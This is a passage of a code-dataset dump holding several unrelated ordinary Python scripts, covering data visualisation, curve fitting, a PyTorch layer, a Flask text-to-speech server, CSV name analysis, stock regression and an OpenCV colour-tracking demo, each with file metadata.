fig = go.Figure(data=data, layout=layout)\n    py.plot(fig, filename='stacked-bar')\n\ndef analyse_project_type_and_property():\n    sql_type = \"SELECT project_type, COUNT(*) from project GROUP BY project_type ORDER BY COUNT(*) DESC LIMIT 5\"\n    type_data = execute(sql_type)\n    type_dict = {}\n    for index in range(len(type_data)):\n        name = type_data[index][0]\n        value = type_data[index][1]\n        type_dict[name] = value\n    trace0 = go.Bar(\n        x= list(type_dict.keys()),\n        y= list(type_dict.values()),\n        name = '课题类型',\n        marker = dict(\n            color = 'rgb(139,10,80)'\n        )\n    )\n\n    sql_property = \"SELECT project_property, COUNT(*) from project GROUP BY project_property ORDER BY COUNT(*) DESC LIMIT 6\"\n    property_data = execute(sql_property)\n    property_dict = {}\n    for index in range(len(property_data)):\n        name = property_data[index][0]\n        value = property_data[index][1]\n        property_dict[name] = value\n    trace1 = go.Bar(\n        x=list(property_dict.keys()),\n        y=list(property_dict.values()),\n        name='课题性质',\n        marker=dict(\n            color='rgb(255,228,225)'\n        )\n    )\n\n    data = [trace0, trace1]\n    py.plot(data)\n    return None\n\ndef analyse_project_title(academy, stopword, img_url):\n    path = r'C:\\Users\\casua\\Desktop\\新建文件夹'\n    font = r'C:/Windows/Fonts/STKAITI.ttf'\n    sql = \"SELECT project_name FROM project WHERE student_major = %s \" % academy\n    data = execute(sql)\n    words = {}\n    # for title in list(data):\n    #     for w, c in jieba.analyse.extract_tags(str(title), withWeight=True):\n    #         try:\n    #             words[w] = words[w] + float(c)\n    #         except:\n    #             words[w] = float(c)\n\n\n    wash_signature = []\n    a = list(data)\n    print(list(a))\n    for title in list(data):\n        rep = re.compile(\"1f\\\\d+\\\\w*|[<>/=【】『』♂ω]\")\n        item = rep.sub(\"\", title[0])\n        wash_signature.append(item)\n\n    words = \"\".join(wash_signature)\n    wordlist = jieba.cut(words, cut_all=True)\n    rst = \" \".join(wordlist)\n    print(len(rst))\n    img = Image.open(path + img_url)\n    img_array = np.array(img)\n    wc = WordCloud(\n        background_color='white',\n        width=1000,\n        height=800,\n        mask=img_array,\n        
font_path=font,\n        stopwords=stopword\n    )\n    wc.generate_from_text(rst) # draw the word cloud\n    plt.imshow(wc)\n    plt.axis('off')\n    plt.figure()\n    plt.show() # show the image\n    wc.to_file(path + r'\\new.png') # save the image\n    return None\n\n\nif __name__ == '__main__':\n    # data = analyse_academy()\n    # analyse_project_teacher()\n    # analyse_project_student_name()\n    # analyse_project_type_and_property()\n    cs_stopword = ['基于', '设计', '实现', '管理系', '管理', '管理系统']\n    cs_img_url = r'\\photo-1527443154391-507e9dc6c5cc.jpg'\n    cs_name = \"'\"+'计算机科学与工程学院'+\"'\"\n\n    ee_stopword = ['基于','设计','控制','系统']\n    ee_img_url = r'\\photo-1527443154391-507e9dc6c5cc.jpg'\n    ee_name = \"'\" + '电子信息学院' + \"'\"\n\n    ec_stopword = ['设计','研究','XXX','XX']\n    ec_img_url = r'\\photo-1527443154391-507e9dc6c5cc.jpg'\n    ec_name = \"'\" + '经济管理学院' + \"'\"\n\n    cl_stopword = ['研究','设计']\n    cl_img_url = r'\\photo-1527443154391-507e9dc6c5cc.jpg'\n    cl_name = \"'\" + '材料科学与工程学院' + \"'\"\n\n    cb_stopword = ['研究']\n    cb_img_url = r'\\photo-1527443154391-507e9dc6c5cc.jpg'\n    cb_name = \"'\" + '船舶与海洋工程学院' + \"'\"\n\n    analyse_project_title(cl_name, cl_stopword, cl_img_url)", "sub_path": "analysis.py", "file_name": "analysis.py", "file_ext": "py", "file_size_in_byte": 7545, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "db_util.execute", "line_number": 17, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 23, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 23, "usage_type": "name"}, {"api_name": "db_util.execute", "line_number": 32, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 38, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 38, "usage_type": "name"}, {"api_name": "db_util.execute", "line_number": 47, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 53, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 53, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 62, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 62, "usage_type": "name"}, {"api_name": "db_util.execute", "line_number": 67, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 73, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 73, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 82, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 82, "usage_type": "name"}, {"api_name": "db_util.execute", "line_number": 87, "usage_type": "call"}, {"api_name": "db_util.execute", "line_number": 99, "usage_type": "call"}, {"api_name": "db_util.execute", "line_number": 100, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 104, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 104, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 113, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 113, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 123, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 123, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 126, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 126, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 127, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 127, "usage_type": "name"}, 
{"api_name": "db_util.execute", "line_number": 131, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 137, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 137, "usage_type": "name"}, {"api_name": "db_util.execute", "line_number": 147, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 153, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 153, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 163, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 163, "usage_type": "name"}, {"api_name": "db_util.execute", "line_number": 170, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 184, "usage_type": "call"}, {"api_name": "jieba.analyse.cut", "line_number": 189, "usage_type": "call"}, {"api_name": "jieba.analyse", "line_number": 189, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 192, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 192, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 193, "usage_type": "call"}, {"api_name": "wordcloud.WordCloud", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}]} +{"seq_id": "193365014", "text": "from scipy.optimize import curve_fit\nfrom scipy.signal import TransferFunction\nfrom matplotlib import pyplot\n\nimport csv\nimport numpy\n\n#v_s = {} # tensão da entrada\n#v_s['x'] = []\n#v_s['y'] = []\n\nv_c = {} # tensão da saída - indutor\nv_c['x'] = []\nv_c['y'] = []\n\n\n# leitura dos dados do canal 1 - entrada degrau\n#with open('ch1_tratado.csv', newline='\\n') as csvfile:\n# spamreader = csv.reader(csvfile, delimiter = ',')\n# for row in spamreader:\n# v_s['x'].append(row[3])\n# v_s['y'].append(row[4])\n\n# leitura dos dados do canal 2 - saída do indutor\nwith open('F0001CH2.CSV', newline='\\n') as csvfile:\n spamreader = csv.reader(csvfile, delimiter = ',')\n for row in spamreader:\n v_c['x'].append(row[3])\n v_c['y'].append(row[4])\n\n# convertendo os dados para valores numéricos\n\nv_c['x'] = [float(x) for x in v_c['x']]\nv_c['y'] = [float(y) for y in v_c['y']]\n\n''' resposta do indutor a entrada degrau:\n V_l = V_s*e^(-t*(R/L))\n'''\nf = lambda t, V, R, C: V * (1 - numpy.exp(-t/(R*C)))\n\n# fiting dos parametros da curva para t >= 0\npopt, pcov = curve_fit(f, v_c['x'][v_c['x'].index(0.):], v_c['y'][v_c['x'].index(0.):])\n\nv_c_adj = [ f(x, popt[0], popt[1], popt[2]) for x in v_c['x'][v_c['x'].index(0.):]]\n\n# impressão dos parametros da curva:\nprint(popt)\n\n# impressão do erro / desvio padrão\nprint(numpy.sqrt(numpy.diag(pcov)))\n\n# plotting dos gráficos - a ser melhorado:\npyplot.plot(v_c['x'][v_c['x'].index(0.):],v_c['y'][v_c['x'].index(0.):],'x',v_c['x'][v_c['x'].index(0.):],v_c_adj,'r-')\npyplot.show()\n", "sub_path": "CDSD/pratica_1/processamento.py", "file_name": "processamento.py", "file_ext": "py", 
"file_size_in_byte": 1548, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "csv.reader", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "561719853", "text": "import torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass MultiLabelLayer(nn.Module):\n def __init__(self, class_num, input_length):\n super(MultiLabelLayer, self).__init__()\n self.class_num = class_num\n self.input_length = input_length\n self.softmax = nn.Softmax()\n linear_sq = []\n for i in range(len(class_num)):\n linear_sq.append(nn.Linear(self.input_length, class_num[i]))\n self.linear_sq = linear_sq\n\n def forward(self, x):\n result = []\n for linear in self.linear_sq:\n out = F.softmax(linear(x), dim=1)\n result.append(out)\n return result\n\n\nclass MultiOutModel(nn.Module):\n def __init__(self, model, label_list):\n super(MultiOutModel, self).__init__()\n self.model = model\n self.label_list = label_list\n\n def forward(self, x):\n x = self.model(x)\n x = x.view(x.size(0), -1)\n length = x.size(1)\n linear = MultiLabelLayer(self.label_list, length)\n out = linear(x)\n return out\n\n\nif __name__ == '__main__':\n import torch\n from models.shufflenet import ShuffleNetG2\n model = ShuffleNetG2()\n net = MultiOutModel(model, [2, 2, 2])\n x = torch.rand(1, 3, 32, 32)\n print(net(x))\n\n", "sub_path": "utils/multi_label.py", "file_name": "multi_label.py", "file_ext": "py", "file_size_in_byte": 1271, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 5, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "models.shufflenet.ShuffleNetG2", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "413652706", "text": "#!/usr/bin/env python3\nimport io\nimport os\nimport time\nfrom pathlib import Path\n\nimport torch\nfrom flask import Flask, Response, render_template, request\nfrom flask_cors import CORS\nfrom TTS.tf.utils.tflite import load_tflite_model\nfrom TTS.tf.utils.io import load_checkpoint\nfrom TTS.utils.io import load_config\nfrom TTS.utils.text.symbols import symbols, phonemes\nfrom TTS.utils.audio import AudioProcessor\nfrom 
TTS.utils.synthesis import synthesis\n\n_DIR = Path(__file__).parent\n\n# -----------------------------------------------------------------------------\n\n\ndef run_vocoder(mel_spec):\n vocoder_inputs = mel_spec[None, :, :]\n # get input and output details\n input_details = vocoder_model.get_input_details()\n # reshape input tensor for the new input shape\n vocoder_model.resize_tensor_input(input_details[0]['index'], vocoder_inputs.shape)\n vocoder_model.allocate_tensors()\n detail = input_details[0]\n vocoder_model.set_tensor(detail['index'], vocoder_inputs)\n # run the model\n vocoder_model.invoke()\n # collect outputs\n output_details = vocoder_model.get_output_details()\n waveform = vocoder_model.get_tensor(output_details[0]['index'])\n return waveform \n\n\ndef tts(model, text, CONFIG, p):\n t_1 = time.time()\n waveform, alignment, mel_spec, mel_postnet_spec, stop_tokens, inputs = synthesis(model, text, CONFIG, use_cuda, ap, speaker_id, style_wav=None,\n truncated=False, enable_eos_bos_chars=CONFIG.enable_eos_bos_chars,\n backend='tflite')\n waveform = run_vocoder(mel_postnet_spec.T)\n waveform = waveform[0, 0]\n rtf = (time.time() - t_1) / (len(waveform) / ap.sample_rate)\n tps = (time.time() - t_1) / len(waveform)\n print(waveform.shape)\n print(\" > Run-time: {}\".format(time.time() - t_1))\n print(\" > Real-time factor: {}\".format(rtf))\n print(\" > Time per step: {}\".format(tps))\n return alignment, mel_postnet_spec, stop_tokens, waveform\n\n\n# -----------------------------------------------------------------------------\n\n# runtime settings\nuse_cuda = False\n\n# model paths\nTTS_MODEL = str(_DIR / \"model\" / \"tts_model.tflite\")\nTTS_CONFIG = str(_DIR / \"model\" / \"config.json\")\nVOCODER_MODEL = str(_DIR / \"vocoder\" / \"vocoder_model.tflite\")\nVOCODER_CONFIG = str(_DIR / \"vocoder\" / \"config_vocoder.json\")\n\n# load configs\nTTS_CONFIG = load_config(TTS_CONFIG)\nVOCODER_CONFIG = load_config(VOCODER_CONFIG)\n\n# load the audio processor\nap = AudioProcessor(**TTS_CONFIG.audio)\n\n# LOAD TTS MODEL\n# multi speaker\nspeaker_id = None\nspeakers = []\n\n# load the model\nmodel = load_tflite_model(TTS_MODEL)\nvocoder_model = load_tflite_model(VOCODER_MODEL)\n\n# -----------------------------------------------------------------------------\n\napp = Flask(\"mozillatts\")\nCORS(app)\n\n# -----------------------------------------------------------------------------\n\n\n@app.route(\"/api/tts\")\ndef api_tts():\n text = request.args.get(\"text\", \"\").strip()\n align, spec, stop_tokens, wav = tts(model, text, TTS_CONFIG, ap)\n\n with io.BytesIO() as out:\n ap.save_wav(wav, out)\n return Response(out.getvalue(), mimetype=\"audio/wav\")\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n# -----------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5002)\n", "sub_path": "tts.py", "file_name": "tts.py", "file_ext": "py", "file_size_in_byte": 3443, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 17, "usage_type": "call"}, {"api_name": "time.time", "line_number": 40, "usage_type": "call"}, {"api_name": "TTS.utils.synthesis.synthesis", "line_number": 41, "usage_type": "call"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, 
"usage_type": "call"}, {"api_name": "TTS.utils.io.load_config", "line_number": 67, "usage_type": "call"}, {"api_name": "TTS.utils.io.load_config", "line_number": 68, "usage_type": "call"}, {"api_name": "TTS.utils.audio.AudioProcessor", "line_number": 71, "usage_type": "call"}, {"api_name": "TTS.tf.utils.tflite.load_tflite_model", "line_number": 79, "usage_type": "call"}, {"api_name": "TTS.tf.utils.tflite.load_tflite_model", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 84, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 92, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 92, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 97, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "251284305", "text": "import os\nimport csv\nimport collections\nfrom typing import List\n\ndata = []\n\nRecord = collections.namedtuple('Record', 'uid,name,total,'\n 'male_share,female_share,gap')\n\n\ndef init():\n base_folder = os.path.dirname(__file__)\n filename = os.path.join(base_folder, 'data', 'unisex_names_table.csv')\n\n with open(filename, 'r', encoding='utf-8') as fin:\n reader = csv.DictReader(fin)\n\n data.clear()\n for row in reader:\n record = parse_row(row)\n data.append(record)\n\n\ndef parse_row(row):\n row[''] = int(row[''])\n row['total'] = float(row['total'])\n row['male_share'] = float(row['male_share'])\n row['female_share'] = float(row['female_share'])\n row['gap'] = float(row['gap'])\n\n record = Record(row[''], row['name'], row['total'], row['male_share'],\n row['female_share'], row['gap'])\n\n return record\n\n\ndef most_male_name() -> List[Record]:\n return sorted(data, key=lambda r: -r.male_share)\n\n\ndef most_female_name() -> List[Record]:\n return sorted(data, key=lambda r: -r.female_share)\n\n\ndef most_unisex_name() -> List[Record]:\n return sorted(data, key=lambda r: r.gap)\n\n\nif __name__ == '__main__':\n print('Unisex Names')\n init()\n print('The 5 most male unisex names')\n names = most_male_name()\n for idx, d in enumerate(names[:5]):\n print(f'{idx+1} {d.name} with {d.male_share} % Male')\n print('The 5 most female unisex names')\n names = most_female_name()\n for idx, d in enumerate(names[:5]):\n print(f'{idx+1} {d.name} with {d.female_share} % Female')\n print('The 5 most unisex names')\n names = most_unisex_name()\n for idx, d in enumerate(names[:5]):\n print(f'{idx+1} {d.name} with {d.gap} % difference between male '\n f'and female usage')", "sub_path": "days/37-39-csv-data-analsys/unisex_names/research.py", "file_name": "research.py", "file_ext": "py", "file_size_in_byte": 1838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "collections.namedtuple", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "csv.DictReader", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 38, "usage_type": 
"name"}, {"api_name": "typing.List", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "12082108", "text": "# import lots of things\nimport pandas as pd\nimport pandas_datareader.data as web\nfrom pandas import Series, DataFrame\nimport datetime\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.linear_model import Ridge\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn import preprocessing\n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom matplotlib import style\n\nimport math\nimport numpy as np\n\nstart = datetime.datetime(2015, 1, 1)\nend = datetime.datetime(2019, 9, 7)\n\ndataset = web.DataReader(\"NFLX\", 'yahoo', start, end)\n\ndatasetfreg = dataset.loc[:, ['Adj Close', 'Volume']]\ndatasetfreg['HL_PCT'] = (dataset['High'] - dataset['Low']\n ) / dataset['Close'] * 100.0\ndatasetfreg['PCT_change'] = (\n dataset['Close'] - dataset['Open']) / dataset['Open'] * 100.0\n\n# Drop missing value\ndatasetfreg.fillna(value=-99999, inplace=True)\n\n# We want to separate 1 percent of the data to forecast\nforecast_out = int(math.ceil(0.02 * len(datasetfreg)))\n\n# Separating the label here, we want to predict the AdjClose\nforecast_col = 'Adj Close'\ndatasetfreg['label'] = datasetfreg[forecast_col].shift(-forecast_out)\nX = np.array(datasetfreg.drop(['label'], 1))\n\n\n# Scale the X so that everyone can have the same distribution for linear regression\nX = preprocessing.scale(X)\n\n# Finally We want to find Data Series of late X and early X (train) for model generation and evaluation\nX_lately = X[-forecast_out:]\nX = X[:-forecast_out]\n\n# Separate label and identify it as y\ny = np.array(datasetfreg['label'])\ny = y[:-forecast_out]\n\nprint(datasetfreg.shape)\n\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.35, random_state=0)\n\n# Linear regression\nclfreg = LinearRegression(n_jobs=-1)\nclfreg.fit(X_train, y_train)\n\n# Quadratic Regression 2\nclfpoly2 = make_pipeline(PolynomialFeatures(2), Ridge())\nclfpoly2.fit(X_train, y_train)\n\n# Quadratic Regression 3\nclfpoly3 = make_pipeline(PolynomialFeatures(3), Ridge())\nclfpoly3.fit(X_train, y_train)\n\n# KNN Regression\nclfknn = KNeighborsRegressor(n_neighbors=2)\nclfknn.fit(X_train, y_train)\n\nconfidencereg = clfreg.score(X_test, y_test)\nconfidencepoly2 = clfpoly2.score(X_test, y_test)\nconfidencepoly3 = clfpoly3.score(X_test, y_test)\nconfidenceknn = clfknn.score(X_test, y_test)\n\nprint('The linear regression confidence is ', confidencereg)\nprint('The quadratic regression 2 confidence is', confidencepoly2)\nprint('The quadratic regression 3 confidence is', confidencepoly3)\nprint('The knn regression confidence is', confidenceknn)\n\nforecast_set = clfpoly2.predict(X_lately)\nregression_set = clfpoly2.predict(X)\ndatasetfreg['Forecast'] = np.nan\n\n\nmpl.rc('figure', figsize=(20, 10))\nmpl.__version__\n\nlast_date = datasetfreg.iloc[-1].name\nlast_unix = last_date\nnext_unix = last_unix + datetime.timedelta(days=1)\n\n\nfor i in forecast_set:\n next_date = next_unix\n next_unix += datetime.timedelta(days=1)\n datasetfreg.loc[next_date] = [\n np.nan for _ in 
range(len(datasetfreg.columns)-1)]+[i]\n\nplt.plot(datasetfreg['Adj Close'].tail(400))\nplt.plot(datasetfreg['Forecast'].tail(400))\n\n\nplt.legend(loc=4)\nplt.xlabel('Date')\nplt.ylabel('Price')\nplt.show()\n", "sub_path": "homework.py", "file_name": "homework.py", "file_ext": "py", "file_size_in_byte": 3474, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas_datareader.data.DataReader", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas_datareader.data", "line_number": 28, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 49, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 65, "usage_type": "call"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 73, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 73, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 73, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsRegressor", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 92, "usage_type": "attribute"}, {"api_name": "matplotlib.rc", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.__version__", "line_number": 96, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 107, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}]} +{"seq_id": "388773369", "text": "import matplotlib.pyplot as plt\nimport math\n\nplt.rcParams['font.family'] = \"Arial\"\n\ntime = [7, 9, 11, 12, 14]\naccuracy = [0.491, 
0.513, 0.500, 0.479, 0.474]\nprecision = [0.416, 0.443, 0.420, 0.422, 0.404]\nrecall = [ 0.401, 0.433, 0.420, 0.403, 0.399]\nf1 = [0.401, 0.430, 0.413, 0.400, 0.389]\n\na = plt.plot(time, accuracy, color='blue', label='Accuracy')\nb = plt.plot(time, precision, color='black', label='Precision')\nc = plt.plot(time, recall, color='red', label='Recall')\nd = plt.plot(time, f1, color='green', label='F1 score')\n\nplt.legend()\n\nplt.xlabel(\"Training time\", fontsize = 14)\nplt.ylabel(\"Evaluation metrics\", fontsize = 14)\n\nplt.show()\n\n", "sub_path": "obligatory1/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 4, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 4, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "256220938", "text": "import cv2\r\nimport numpy as np\r\n\r\ndef nothing(x):\r\n pass\r\n\r\ncap = cv2.VideoCapture(0);\r\n\r\ncv2.namedWindow(\"Tracking\")\r\ncv2.createTrackbar(\"LH\", \"Tracking\", 0,255,nothing)\r\ncv2.createTrackbar(\"LS\", \"Tracking\", 0,255,nothing)\r\ncv2.createTrackbar(\"LV\", \"Tracking\", 0,255,nothing)\r\n\r\ncv2.createTrackbar(\"UH\", \"Tracking\", 255,255,nothing)\r\ncv2.createTrackbar(\"US\", \"Tracking\", 255,255,nothing)\r\ncv2.createTrackbar(\"UV\", \"Tracking\", 255,255,nothing)\r\n\r\n\r\n\r\n\r\nwhile True:\r\n frame = cv2.imread('m&m.jpg')\r\n # _, frame = cap.read()\r\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n\r\n l_h = cv2.getTrackbarPos(\"LH\", \"Tracking\")\r\n l_s = cv2.getTrackbarPos(\"LS\", \"Tracking\")\r\n l_v = cv2.getTrackbarPos(\"LV\", \"Tracking\")\r\n\r\n u_h = cv2.getTrackbarPos(\"UH\", \"Tracking\")\r\n u_s = cv2.getTrackbarPos(\"US\", \"Tracking\")\r\n u_v = cv2.getTrackbarPos(\"UV\", \"Tracking\")\r\n\r\n l_b = np.array([l_h,l_s,l_v])\r\n u_b = np.array([u_h,u_s,u_v])\r\n\r\n mask = cv2.inRange(hsv, l_b, u_b)\r\n res = cv2.bitwise_and (frame, frame, mask = mask)\r\n\r\n 